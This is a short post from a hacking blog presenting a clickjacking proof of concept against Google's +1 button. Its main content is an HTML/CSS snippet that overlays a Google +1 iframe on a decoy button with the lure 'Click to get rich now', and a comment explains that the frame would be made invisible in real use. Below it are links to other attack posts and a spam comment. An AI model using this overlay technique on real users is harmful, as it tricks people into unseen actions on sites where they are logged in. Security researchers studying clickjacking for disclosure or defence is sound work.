Hacking Monks: Google G+1 ClickJacking BUG

Sunday, 16 July 2017

Google G+1 ClickJacking BUG

The previous basic introduction tutorial - https://www.youtube.com/watch?v=cbgNHnMsaPg&t=192s

The snippet -

<style>
iframe { /* iframe from the victim site */
width: 400px;
height: 100px;
position: absolute;
top:0; left:0px;
opacity: 1; /* in real opacity:0 */
z-index: 1;
}
</style>

<div>Click to get rich now:</div>


<iframe src="https://plusone.google.com/_/+1/fastbutton?bsv&size=medium&hl=en-US&url=https://engineering.linkedin.com/security/our-private-bug-bounty-program-reducing-vulnerabilities-leveraging-expert-crowds"></iframe>

<button>Click here!</button>

<div>...And you're cool (I'm a cool hacker actually)!</div>

............................................................

Other Posts -

Hack everything with Shodan (hackers google)

Make WORDLISTS to HACK (Kali Linux - Crunch)

How to Kick People OFF your Wi-Fi and LAN network (Windows)

Watch Live Cyber War (Hackers playground)

Facebook trolling Hackers (Funny Header)

Facebook Mail Bombing (rejected POC)

Instagram Content Injection (Text) bug POC

AMAZON Password Reset Bug POC

PAYTMPromoCode BUG POC

YoutubeUnauthorized Adword Linking BUG POC

WhatsApp Translate Account Takeover BUG POC (slow rate limit)

Cross Site Scripting (XSS) - 6 (Reflected XSS at its best)

Create Unlimited Instagram Accounts (unvalidated verification)

1 comment:

preethi Shetty28 February 2018 at 23:25
Oh great,
Looking nice information learned a lot from your blog.
Need updates like this plz do keep sharing on...
Digital Marketing Online Training | SEO Online Training | Google Analytics Online Training | Doubleclick for Publishers Training
ReplyDelete

Subscribe to: Post Comments (Atom)